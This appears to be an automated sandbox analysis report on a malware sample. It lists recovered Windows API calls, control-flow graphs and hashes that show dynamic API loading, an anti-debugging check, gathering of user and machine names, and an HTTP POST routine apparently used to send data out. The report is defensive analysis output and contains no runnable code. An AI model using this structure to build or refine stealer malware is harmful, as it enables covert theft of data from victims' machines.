27692->27693 27694 4015a3 27693->27694 27694->27415 27723 401030 27695->27723 27699 404838 lstrlenA 27726 41aad0 27699->27726 27701 404848 InternetCrackUrlA 27702 404867 27701->27702 27702->27492 27704 41a740 lstrcpy 27703->27704 27705 418b74 27704->27705 27706 41a740 lstrcpy 27705->27706 27707 418b82 GetSystemTime 27706->27707 27708 418b99 27707->27708 27709 41a7a0 lstrcpy 27708->27709 27710 418bfc 27709->27710 27710->27507 27712 41a931 27711->27712 27713 41a988 27712->27713 27715 41a968 lstrcpy lstrcatA 27712->27715 27714 41a7a0 lstrcpy 27713->27714 27716 41a994 27714->27716 27715->27713 27716->27510 27717->27625 27719 409af9 LocalAlloc 27718->27719 27720 404eee 27718->27720 27719->27720 27721 409b14 CryptStringToBinaryA 27719->27721 27720->27513 27720->27515 27721->27720 27722 409b39 LocalFree 27721->27722 27722->27720 27724 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27723->27724 27725 41aad0 27724->27725 27725->27699 27726->27701 27727->27635 27851 416ab1 903 API calls 27820 4069f3 7 API calls 27793 22e0297 131 API calls 27794 22eae93 43 API calls ctype 27853 41cafe 219 API calls 4 library calls 27855 22ecce9 162 API calls ___crtGetStringTypeA 27889 22e19e7 StrCmpCA ExitProcess strtok_s strtok_s 27890 22e35e4 9 API calls 26298 401190 26305 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26298->26305 26300 40119e 26301 4011cc 26300->26301 26307 417850 GetProcessHeap HeapAlloc GetUserNameA 26300->26307 26303 4011b7 26303->26301 26304 4011c4 ExitProcess 26303->26304 26306 417939 26305->26306 26306->26300 26308 4178c3 26307->26308 26308->26303 27856 22e30f9 7 API calls 27857 22df8f1 32 API calls 27858 41ce9f 69 API calls __amsg_exit 27797 4088a4 RaiseException task __CxxThrowException@8 27798 4180a5 GetProcessHeap HeapFree 27822 22e13c7 strtok_s strtok_s 27863 22e3823 8 API calls 27824 41b9b0 RtlUnwind 27865 22e30d0 9 API calls

                                      Control-flow Graph

                                      APIs
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                      • strlen.MSVCRT ref: 004046F0
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 2127927946-2218711628
                                      • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                      • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 750 419860-419874 call 419750 753 419a93-419af2 LoadLibraryA * 5 750->753 754 41987a-419a8e call 419780 GetProcAddress * 21 750->754 756 419af4-419b08 GetProcAddress 753->756 757 419b0d-419b14 753->757 754->753 756->757 758 419b46-419b4d 757->758 759 419b16-419b41 GetProcAddress * 2 757->759 761 419b68-419b6f 758->761 762 419b4f-419b63 GetProcAddress 758->762 759->758 763 419b71-419b84 GetProcAddress 761->763 764 419b89-419b90 761->764 762->761 763->764 765 419bc1-419bc2 764->765 766 419b92-419bbc GetProcAddress * 2 764->766 766->765
                                      APIs
                                      • GetProcAddress.KERNEL32(75900000,00690DF0), ref: 004198A1
                                      • GetProcAddress.KERNEL32(75900000,00690C88), ref: 004198BA
                                      • GetProcAddress.KERNEL32(75900000,00690D30), ref: 004198D2
                                      • GetProcAddress.KERNEL32(75900000,00690B50), ref: 004198EA
                                      • GetProcAddress.KERNEL32(75900000,00690B98), ref: 00419903
                                      • GetProcAddress.KERNEL32(75900000,00690140), ref: 0041991B
                                      • GetProcAddress.KERNEL32(75900000,00686178), ref: 00419933
                                      • GetProcAddress.KERNEL32(75900000,006862B8), ref: 0041994C
                                      • GetProcAddress.KERNEL32(75900000,00690B68), ref: 00419964
                                      • GetProcAddress.KERNEL32(75900000,00690D60), ref: 0041997C
                                      • GetProcAddress.KERNEL32(75900000,00690CD0), ref: 00419995
                                      • GetProcAddress.KERNEL32(75900000,00690C28), ref: 004199AD
                                      • GetProcAddress.KERNEL32(75900000,006861D8), ref: 004199C5
                                      • GetProcAddress.KERNEL32(75900000,00690B80), ref: 004199DE
                                      • GetProcAddress.KERNEL32(75900000,00690BB0), ref: 004199F6
                                      • GetProcAddress.KERNEL32(75900000,006862D8), ref: 00419A0E
                                      • GetProcAddress.KERNEL32(75900000,00690C10), ref: 00419A27
                                      • GetProcAddress.KERNEL32(75900000,00690D18), ref: 00419A3F
                                      • GetProcAddress.KERNEL32(75900000,00686198), ref: 00419A57
                                      • GetProcAddress.KERNEL32(75900000,00690DD8), ref: 00419A70
                                      • GetProcAddress.KERNEL32(75900000,006862F8), ref: 00419A88
                                      • LoadLibraryA.KERNEL32(00690BC8,?,00416A00), ref: 00419A9A
                                      • LoadLibraryA.KERNEL32(00690C70,?,00416A00), ref: 00419AAB
                                      • LoadLibraryA.KERNEL32(00690BE0,?,00416A00), ref: 00419ABD
                                      • LoadLibraryA.KERNEL32(00690D78,?,00416A00), ref: 00419ACF
                                      • LoadLibraryA.KERNEL32(00690CE8,?,00416A00), ref: 00419AE0
                                      • GetProcAddress.KERNEL32(75070000,00690D00), ref: 00419B02
                                      • GetProcAddress.KERNEL32(75FD0000,00690D90), ref: 00419B23
                                      • GetProcAddress.KERNEL32(75FD0000,00690DA8), ref: 00419B3B
                                      • GetProcAddress.KERNEL32(75A50000,00690E20), ref: 00419B5D
                                      • GetProcAddress.KERNEL32(74E50000,00686218), ref: 00419B7E
                                      • GetProcAddress.KERNEL32(76E80000,00690020), ref: 00419B9F
                                      • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: 0i$NtQueryInformationProcess$`i$xi$xah
                                      • API String ID: 2238633743-2143598283
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 767 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 782 404944 767->782 783 40494b-40494f 767->783 782->783 784 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 783->784 785 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 783->785 784->785 871 404ad3-404ad7 784->871 795 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 785->795 796 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 785->796 796->795 872 404ae5 871->872 873 404ad9-404ae3 871->873 874 404aef-404b22 HttpOpenRequestA 872->874 873->874 875 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 874->875 876 404ebe-404ec5 InternetCloseHandle 874->876 987 404e32-404e5c InternetReadFile 875->987 876->785 988 404e67-404eb9 InternetCloseHandle call 41a800 987->988 989 404e5e-404e65 987->989 988->876 989->988 990 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 989->990 990->987
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                      • StrCmpCA.SHLWAPI(?,006C0DE0), ref: 0040493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,006C0E60), ref: 00404DE8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                      • HttpOpenRequestA.WININET(00000000,006C0E80,?,006C04D0,00000000,00000000,00400100,00000000), ref: 00404B15
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------$l
                                      • API String ID: 2402878923-1660133265
                                      • Opcode ID: 3c2921b9cfa0e43a86e82ea6cf66dae86d06e38acf30f905ce2ae364e5791801
                                      • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                      • Opcode Fuzzy Hash: 3c2921b9cfa0e43a86e82ea6cf66dae86d06e38acf30f905ce2ae364e5791801
                                      • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocNameProcessUser
                                      • String ID:
                                      • API String ID: 1206570057-0
